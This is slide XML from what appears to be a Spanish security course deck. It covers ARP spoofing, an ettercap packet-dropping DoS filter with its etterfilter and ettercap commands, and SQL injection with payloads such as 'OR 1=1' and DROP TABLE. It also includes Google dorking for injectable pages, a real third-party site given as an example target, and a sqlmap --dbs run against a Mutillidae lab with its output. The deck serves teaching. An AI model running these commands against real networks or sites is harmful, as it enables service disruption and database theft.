              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dirección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de la victima y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gateway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 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33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d0f7c5ba4f2f2ed16f2a714332633ad5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373793"/>
            <a:ext cx="12191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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De esta forma empieza a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>envenenar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tabla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de la victima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="es-AR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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11" name="Image9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9825" y="3436842"/>
            <a:ext cx="12038636" cy="122659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61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373793"/>
            <a:ext cx="12191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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tabla ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean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de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victima, vemos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC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es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atacante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean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  <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="es-AR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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12" name="Image10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09192" y="3184435"/>
            <a:ext cx="9989041" cy="291556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8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Dos (Denegación de Servicios)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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esto nos permite como objetivo hacer un denegación de servicio (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) sobre un equipo determinado, para esto vamos a utilizar la herramienta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="28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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creamos el archivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050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</a:rPr>
              <a:t>llamado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dos.elt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, con siguiente contenido </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="24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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == '192.168.1.113' || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip.dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == '192.168.1.113' )</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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{</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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  drop();</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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  kill();</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("Packet Dropper\n");</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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8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 ARP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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Explicación de ataque ARP Dos (Denegación de Servicios)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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2) Luego de eso lo compilamos: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 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  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etterfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dos.elt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dos.ef</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050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 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3) Ejecuto el comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> desde la consola.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 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	# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -T -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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> wlp2s0  -F /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ettercap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dos.ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp:remote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			/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.113//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /192.168.1.1//</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="28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77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Es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un método de infiltración de código intruso que se vale de una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilidad informática</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base de datos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  <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El origen de la vulnerabilidad radica en el incorrecto chequeo o filtrado de las variables utilizadas en un programa que contiene, o bien genera, código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o script que esté embebido dentro de otro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se conoce como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyección SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, indistintamente, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>al tipo de vulnerabilidad, al método de infiltración, al hecho de incrustar código SQL intruso y a la porción de código incrustado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="28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s-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="28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050" name="Picture 2" descr="https://losindestructibles.files.wordpress.com/2012/10/sin-tc3adtulo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21" y="1482132"/>
            <a:ext cx="6386542" cy="46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86655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Ejemplo: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consulta= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SELECT * FROM usuarios WHERE nombre = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nombreUsuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2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"';“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Si el operador escribe un nombre, por ejemplo "Alicia", nada anormal sucederá, la aplicación generaría una sentencia SQL similar a la siguiente, que es perfectamente correcta, en donde se seleccionarían todos los registros con el nombre "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="28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Alicia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" en la base de datos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3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3909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1664645"/>
            <a:ext cx="1219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Búsqueda de frases (“”) -&gt; esto realiza una consulta exacta.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Ej.: “Sistemas Operativos GNU/Linux”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Búsqueda de Palabras (“”) -&gt; utiliza sinónimos de forma automática,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Ej.: “antivirus”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Buscar dentro de un sitio web (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:) -&gt; permite especificar que los resultados de búsqueda procedan de un sitio web determinado.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Ej.: aerolíneas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site:clarin.com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5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Ejemplo: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Pero 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si un operador malintencionado escribe como nombre de usuario a consultar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Alicia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="28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'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="2800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  <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800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se generaría la siguiente consulta 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SQL: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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* FROM usuarios WHERE nombre = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="28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'Alicia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2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s-ES" altLang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" smtClean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7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Parámetros que se utilizan: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‘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“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OR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AND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-1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OR 1=1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2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Buscando url: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Utilizar como navegador Firefox.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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.google.com.ar</a:t>
            </a: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inurl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php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 id=1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Ejemplo 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: http://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www.tunesoman.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="28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product.php?id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=1’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42457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="125150" y="5004106"/>
          <a:ext cx="119416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695">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="1547881747"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="910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Error: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SELECT * FROM `category` WHERE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is_active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='1' AND id =1\'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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line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185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2400561"/>
            <a:ext cx="12191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Herramienta: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http://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www.hackplayers.com/2008/08/herramientas-sql-injection.html</a:t>
            </a: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Nosotros vamos a utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" b="1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sqlmap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 (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http://sqlmap.org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Simuladores de aplicaciones web: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dvwa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-&gt; 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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.dvwa.co.uk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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a: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800" dirty="0" err="1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r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="28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utilidae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-&gt; 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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://sourceforge.net/projects/mutillidae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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a: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https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://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/</a:t>
            </a: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6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Vamos a utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mutilidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2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como simulador en máquina virtual para poder ser controlada.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				http://192.168.1.228/mutilidae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NOTA: Usar Mozilla Firefox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3252787"/>
            <a:ext cx="89058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Ingresamos cualquier usuario por ejemplo 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x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 y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="28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password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x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. En el navegador como GET nos aparece lo siguiente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http://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192.168.1.228/mutillidae/index.php?page=user-info.php&amp;username=x&amp;password=x&amp;user-info-php-submit-button=View+Account+Details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Donde reemplazamos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username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=x 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por el valor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username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=-1’</a:t>
            </a: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				http://192.168.1.228/mutilidae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NOTA: Usar Mozilla Firefox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Vemos que nos aparece el siguiente error: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Esto nos indica que nos da un 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error de SQL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, justo lo que necesitamos para realizar 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SQL Inyección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2" y="1881578"/>
            <a:ext cx="11636985" cy="31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Mediante la herramienta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sqlmap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procedemos a analizar nuestra vulnerabilidad.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./sqlmap.py –u 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“http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://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192.168.1.228/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mutillidae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/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index.php?page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user-info.php&amp;username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x&amp;password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x&amp;user-info-php-submit-button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View+Account+Details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” --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dbs</a:t>
            </a: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30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De esta forma nos devuelve las bases de datos que contiene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MySQL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err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>available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 err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>databases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 [5]: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[*] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="28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[*] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="28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b="1" dirty="0">
